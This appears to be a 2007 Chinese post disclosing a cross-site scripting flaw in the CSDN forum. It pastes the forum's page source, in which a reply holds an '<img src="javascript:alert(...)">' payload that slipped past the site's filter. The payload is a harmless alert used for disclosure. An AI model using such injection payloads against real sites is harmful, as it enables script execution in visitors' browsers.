鉴于CSDN的论坛出现严重跨站漏洞...
本人决定暂且不上...特此声明...
返回的代码如下...
一个编码就过了...真让人心寒啊...
<
input
type
="button"
value
="举报"
onclick
="window.location.href='mai'+'lto:'+'myc'+'sdn@c'+'sdn.n'+'et?subject=CSDN Topic Report';return false"
>
< input type ="button" value ="TOP" onclick ="window.location.href='#top'" > </ td ></ tr ></ table ></ td ></ tr ></ table >
< table class ="item reply" csdnid ="reply_45922064" cellspacing ="1" >< tr > < td class ="info" >
< ul >< li class ="username" >< a target ="_blank" href ="http://hi.csdn.net/chaircat" onmouseover ="javascript:showUserCard();" >< img alt ="" src ="/u/ui/images/blank.gif" class ="userstatus" />< var csdnid ="Reply_Username" > chaircat </ var ></ a ></ li >
< li class ="nickname" >< textarea csdnid ="Reply_NickName" cols ="" rows ="" readonly ="readonly" > chaircat </ textarea ></ li >
< li class ="grade" > 等 级: < img alt ="" csdnid ="Reply_UserRank" class ="grade user5" src ="/u/ui/images/blank.gif" /></ li ></ ul ></ td >
< td class ="main" >< table cellspacing ="0" style ="height: 100%;" >
< tr >< td class ="floor" >< span > 发表于: < var csdnid ='Reply_Date' > 2007-11-05 08:10:28 </ var ></ span >< var csdnid ="Reply_Layer" > 6 </ var > 楼 得分: < var csdnid ='Reply_Point' > 0 </ var ></ td ></ tr >
< tr >< td csdnid ="Reply_Body" class ="content" > 啊哈哈哈哈~~~XSS~~~~ < br /> 好了~~~CSDN的兄弟们有的忙了~~~ < br /> 印象中DV过滤的还可以...还有Discuz... < br /> < img src ="javascript:alert(/跨站跨站I love you~~/)" alt ="" /></ td ></ tr >< tr >< td csdnid ="Reply_ModifyInfo" ></ td ></ tr >< tr >< td class ="function" >
<!-- <span>预留的文字链广告位</span> // -->
< input type ="button" value ="TOP" onclick ="window.location.href='#top'" > </ td ></ tr ></ table ></ td ></ tr ></ table >
< table class ="item reply" csdnid ="reply_45922064" cellspacing ="1" >< tr > < td class ="info" >
< ul >< li class ="username" >< a target ="_blank" href ="http://hi.csdn.net/chaircat" onmouseover ="javascript:showUserCard();" >< img alt ="" src ="/u/ui/images/blank.gif" class ="userstatus" />< var csdnid ="Reply_Username" > chaircat </ var ></ a ></ li >
< li class ="nickname" >< textarea csdnid ="Reply_NickName" cols ="" rows ="" readonly ="readonly" > chaircat </ textarea ></ li >
< li class ="grade" > 等 级: < img alt ="" csdnid ="Reply_UserRank" class ="grade user5" src ="/u/ui/images/blank.gif" /></ li ></ ul ></ td >
< td class ="main" >< table cellspacing ="0" style ="height: 100%;" >
< tr >< td class ="floor" >< span > 发表于: < var csdnid ='Reply_Date' > 2007-11-05 08:10:28 </ var ></ span >< var csdnid ="Reply_Layer" > 6 </ var > 楼 得分: < var csdnid ='Reply_Point' > 0 </ var ></ td ></ tr >
< tr >< td csdnid ="Reply_Body" class ="content" > 啊哈哈哈哈~~~XSS~~~~ < br /> 好了~~~CSDN的兄弟们有的忙了~~~ < br /> 印象中DV过滤的还可以...还有Discuz... < br /> < img src ="javascript:alert(/跨站跨站I love you~~/)" alt ="" /></ td ></ tr >< tr >< td csdnid ="Reply_ModifyInfo" ></ td ></ tr >< tr >< td class ="function" >
<!-- <span>预留的文字链广告位</span> // -->